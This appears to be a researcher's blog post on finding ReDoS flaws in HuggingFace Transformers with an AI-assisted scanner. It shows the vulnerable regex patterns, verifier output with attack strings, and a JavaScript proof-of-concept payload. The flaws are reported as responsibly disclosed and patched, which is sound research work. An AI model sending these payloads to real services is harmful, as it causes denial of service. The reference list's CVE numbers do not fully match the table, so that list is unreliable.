6 CVEs and $750: Automating ReDoS Vulnerability Discovery with AI
The idea started while browsing Huntr’s hacktivity feed. I saw a ReDoS vulnerability reported in HuggingFace Transformers and wondered how many more might be hiding in there. Manually reviewing regex patterns sounded tedious and I only have the attention span of a Skink, so naturally I spent time building a tool to avoid doing it myself. That laziness paid off — 6 CVEs and $750, to be exact.
What Even is ReDoS?
Before we dive in, let me explain what ReDoS (Regular Expression Denial of Service) is for the uninitiated.
Regular expressions (regex) are those cryptic strings that look like your cat walked across your keyboard, but they’re actually incredibly useful for pattern matching. The problem? Some regex patterns are written in ways that cause the regex engine to go on an existential crisis when given certain inputs.
Here’s a classic evil regex:
pattern = r'(a+)+$'
I mean what could go wrong here? Try matching this against the string "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!" and watch your CPU scream for mercy.
What happens is catastrophic backtracking — the regex engine tries to match the pattern, fails, backtracks, tries again, fails, backtracks… you get the idea. The time complexity can be exponential, meaning a carefully crafted string can freeze your server for hours. Or forever.
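To see the blow-up without freezing anything, here is a minimal timing sketch using the evil pattern above. The helper name `time_match` and the chosen lengths are my own, picked to keep the run short; each extra `a` should roughly double the time on a backtracking engine like Python's `re`.

```python
import re
import time

EVIL = re.compile(r'(a+)+$')

def time_match(n: int) -> float:
    """Return the seconds spent failing to match n 'a's followed by '!'."""
    subject = 'a' * n + '!'
    start = time.perf_counter()
    result = EVIL.match(subject)
    elapsed = time.perf_counter() - start
    assert result is None  # the trailing '!' means the match can never succeed
    return elapsed

if __name__ == "__main__":
    # Lengths kept small on purpose: the time grows roughly as 2**n.
    for n in (10, 14, 18, 20):
        print(f"n={n:2d}  {time_match(n):.4f}s")
```

Exact numbers depend on the machine, so none are shown here. Push `n` past 30 and you are in "watch your CPU scream" territory.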
The Grand Plan
I had this idea: what if I could automatically scan codebases for vulnerable regex patterns? Sounds simple enough, but regex parsing is surprisingly hard. There are ReDoS detection tools out there like redos-checker and recheck that tell you if a regex is vulnerable and even provide an attack string. I only needed some way to extract the regexes from the codebase and feed them into a detection tool.
So I did what any brain-rotted developer does in this Dystopian Intelligence Era — outsourced my thinking to ChatGPT.
Together, we built two main scripts:
1. The Scanner (scanner.py)
This script:
- Walks through a project directory
- Finds all Python and JavaScript/TypeScript files
- Extracts regex patterns from calls like re.compile(), re.match(), re.findall(), new RegExp(), and literal /pattern/ syntax
- Pipes each pattern through recheck
Here’s a snippet of the regex extraction logic for Python (the actual script is about 350 lines):
# Find re.compile() patterns
compile_pattern = r're\.compile\s*\(\s*([rfb]?[\'\"]{1,3}.*?[\'\"]{1,3})\s*(?:,\s*(?:re\.)?([A-Z|\s\|]*))?\s*\)'
# Find re.search(), re.match(), etc.
re_funcs = r'(?:search|match|findall|finditer|split|fullmatch)'
# Raw f-string: the {1,3} quantifier braces are doubled so they survive formatting
re_func_pattern = rf're\.{re_funcs}\s*\(\s*([rfb]?[\'\"]{{1,3}}.*?[\'\"]{{1,3}})'
Yes, I’m using regex to find regex. We’ve gone full inception. Leonardo DiCaprio would be proud.
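For comparison, here is a sketch of the same extraction step done with Python's `ast` module instead of regex-on-regex. This is not how scanner.py works; it is an alternative I am assuming would behave similarly for simple cases. The function name `extract_patterns` and the `RE_FUNCS` set are hypothetical, and it only catches calls written as `re.<func>("literal", ...)`.

```python
import ast

# Functions of the re module whose first argument is a pattern (assumed list).
RE_FUNCS = {"compile", "search", "match", "findall",
            "finditer", "split", "fullmatch", "sub"}

def extract_patterns(source: str) -> list[tuple[int, str]]:
    """Return (line number, pattern) for each re.<func>("literal", ...) call."""
    found = []
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Attribute)
                and isinstance(node.func.value, ast.Name)
                and node.func.value.id == "re"
                and node.func.attr in RE_FUNCS
                and node.args
                and isinstance(node.args[0], ast.Constant)
                and isinstance(node.args[0].value, str)):
            found.append((node.lineno, node.args[0].value))
    return sorted(found)

if __name__ == "__main__":
    sample = 'import re\nA = re.compile(r"(a+)+$")\nB = re.match("x.*y", text)\n'
    for lineno, pattern in extract_patterns(sample):
        print(lineno, pattern)
```

The trade-off: the AST route handles quoting and multi-line calls for free, but it misses patterns built at runtime or imported under another name, and it does nothing for JavaScript/TypeScript files.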
2. The Verifier (verify.py)
The scanner can have false positives, so the verifier script:
- Parses the scanner output
- Takes each “vulnerable” pattern and its attack string
- Actually runs the attack in a controlled environment using Node.js
- If the regex takes longer than 10 seconds to execute — boom, confirmed vulnerability
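The timeout check in the last two steps can be sketched in Python as below. The real verify.py runs the attack in Node.js, so treat this as an approximation: the helper name `is_slow` and the child one-liner are my own, and Python's `re` engine does not always agree with JavaScript's about which patterns blow up.

```python
import subprocess
import sys

# Child process: pattern comes in via argv, attack string via stdin.
CHILD = "import re, sys; re.search(sys.argv[1], sys.stdin.read())"

def is_slow(pattern: str, attack: str, timeout_s: float = 10.0) -> bool:
    """Return True if matching `pattern` against `attack` exceeds the timeout."""
    try:
        subprocess.run(
            [sys.executable, "-c", CHILD, pattern],
            input=attack,
            text=True,
            capture_output=True,
            timeout=timeout_s,  # the child is killed when this expires
        )
    except subprocess.TimeoutExpired:
        return True
    return False

if __name__ == "__main__":
    print(is_slow(r"(a+)+$", "a" * 40 + "!", timeout_s=2.0))
    print(is_slow(r"abc", "abc"))
```

Running the match in a separate process matters: a regex stuck in backtracking cannot be interrupted from inside the same interpreter, but a child process can simply be killed.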
The Hunt: Transformers Edition
With my shiny new scanner ready, I needed a target. HuggingFace’s Transformers library was perfect:
- Huge codebase with tons of regex
- Critical infrastructure for the AI/ML community
- Covered by Huntr.com's bug bounty program
I pointed my scanner at the Transformers repo and let it rip:
$ python3 scanner.py transformers/ | tee scan-result-transformers.txt
Found 1049 regex pattern(s) in 397 file(s):
# ... rest of the 8000 lines of the output ...
$ python3 verify.py scan-result-transformers.txt
Found 38 potentially vulnerable patterns
Testing regex: /<.*?>/
Attack string: '<'.repeat(54773) + '\n<>'
[VULNERABLE] Pattern took longer than 10 seconds to complete
--------------------------------------------------------------------------------
Testing regex: /config\.(.*)\.json/
Attack string: 'jsonconfig.f'.repeat(15812) + 'json'
[VULNERABLE] Pattern took longer than 10 seconds to complete
--------------------------------------------------------------------------------
# ... more patterns tested ...
The feeling of seeing [VULNERABLE] pop up in red after a 10 second hang was oddly satisfying. The laziness indeed paid off.
A few minutes later, I had a treasure map of vulnerable patterns. Out of all the findings, I selected and verified 6 distinct vulnerabilities with real impact potential. Now came the tedious part: writing up reports on Huntr for each of them 😵‍💫.
The Vulnerabilities
Here’s what I found:
| CVE | Location | Pattern | Report |
|---|---|---|---|
| CVE-2025-3263 | configuration_utils.py | config\.(.*)\.json | Report link |
| CVE-2025-3264 | dynamic_module_utils.py | Nested try/except blocks | Report link |
| CVE-2025-3933 | processing_donut.py | <s_(.*?)> | Report link |
| CVE-2025-5197 | modeling_tf_pytorch_utils.py | /[^/]*___([^/]*)/ | Report link |
| CVE-2025-6051 | number_normalizer.py | Long sequence of digits | Report link |
| CVE-2025-6638 | tokenization_marian.py | >>.+<< | Report link |
Each of these patterns could freeze a process when given a malicious input. In a production environment where Transformers is used to process user inputs (think chatbots, model loading from untrusted sources, etc.), these could be weaponized for Denial of Service attacks.
The Payday
I reported all 6 vulnerabilities through Huntr.com, which is like HackerOne but specifically for AI/ML and open source projects.
The process was smooth:
- Submit the vulnerability report with PoC
- Wait for triage (usually a few days)
- Get confirmation and CVE assignment
- 💰
Final count:
- 6 vulnerabilities reported
- 6 CVEs assigned
- $750 in bounties ($125 each)
- 1 very happy me
Not bad for a few hours of work. Although, let’s be honest, the real hours went into reporting the vulnerabilities. But that’s how it is.
Sample Attack
Here’s one of the simpler attack strings:
const regex = /config\.(.*)\.json/;
const payload = "jsonconfig.f".repeat(158120) + "json";
console.time("DoS"); // console.time and console.timeEnd must share the same label
payload.match(regex); // This will take FOREVER
console.timeEnd("DoS");
This is what it feels like to be a frozen server.
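If you would rather watch the growth than freeze a terminal, here is a scaled-down Python sketch of the same attack. The helper name `time_search` and the repeat counts are mine, and I am assuming Python's `re` backtracks much like the JavaScript engine does here. Unlike `(a+)+$`, this pattern looks roughly quadratic rather than exponential: every `config.` in the payload starts a new attempt, and each attempt scans the rest of the string before giving up.

```python
import re
import time

CONFIG_RE = re.compile(r'config\.(.*)\.json')

def time_search(repeats: int) -> float:
    """Return the seconds spent searching a payload that never matches."""
    payload = 'jsonconfig.f' * repeats + 'json'
    start = time.perf_counter()
    result = CONFIG_RE.search(payload)
    elapsed = time.perf_counter() - start
    assert result is None  # every '.' is followed by 'f', so '.json' never appears
    return elapsed

if __name__ == "__main__":
    # Doubling the payload should roughly quadruple the time.
    for repeats in (500, 1000, 2000):
        print(f"repeats={repeats:5d}  {time_search(repeats):.4f}s")
```

That is why the attack string needs tens of thousands of repeats to cross the 10 second mark, while the exponential pattern only needs a few dozen characters.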
What I Learned
1. Automation is king. Manually auditing thousands of regex patterns would have taken weeks. The scanner did it in minutes.
2. AI is a force multiplier. ChatGPT helped me iterate on the scanner logic incredibly fast. It’s making us more effective (and a bit more dangerous). But AI is a double-edged sword: imagine Claude-generated code for critical features being shipped without proper testing.
3. Big projects have low-hanging fruit. You’d think a project maintained by a billion-dollar company would be squeaky clean. Nope. The attack surface is just too large.
4. ReDoS is underrated. It’s not as glamorous as RCE or SQLi, but when your ML inference server gets frozen because someone uploaded a sneaky model config file, you’ll wish you took regex security seriously.
The Tools
If you want to try this yourself, here’s what you need:
- recheck — The ReDoS detection engine
- A target — Pick any large open source project and go hunting
- Patience — Not every finding is exploitable in practice
Closing Thoughts
This was a fun project. I got to combine my love for security research, automation, and AI while making some money on the side. The best part? Those 6 vulnerabilities are now patched, making Transformers safer for everyone who uses it.
Props to the HuggingFace team for quick fixes and being responsive throughout. And if you’re thinking of trying this yourself — go for it, there’s no shortage of targets.
If you’re interested in this kind of work, the barrier to entry is lower than you’d think. Some curiosity, a little patience, and a target — you’re already thinking all the time, why not put it into something like this?
Thanks for reading!
References
- CVE-2025-3262 - NVD
- CVE-2025-1194 - NVD
- CVE-2025-6051 - NVD
- CVE-2025-5197 - NVD
- CVE-2025-3933 - NVD
- CVE-2025-3263 - NVD
- Huntr.com — AI/ML Bug Bounty Platform
- recheck — ReDoS Detection Tool
- HuggingFace Transformers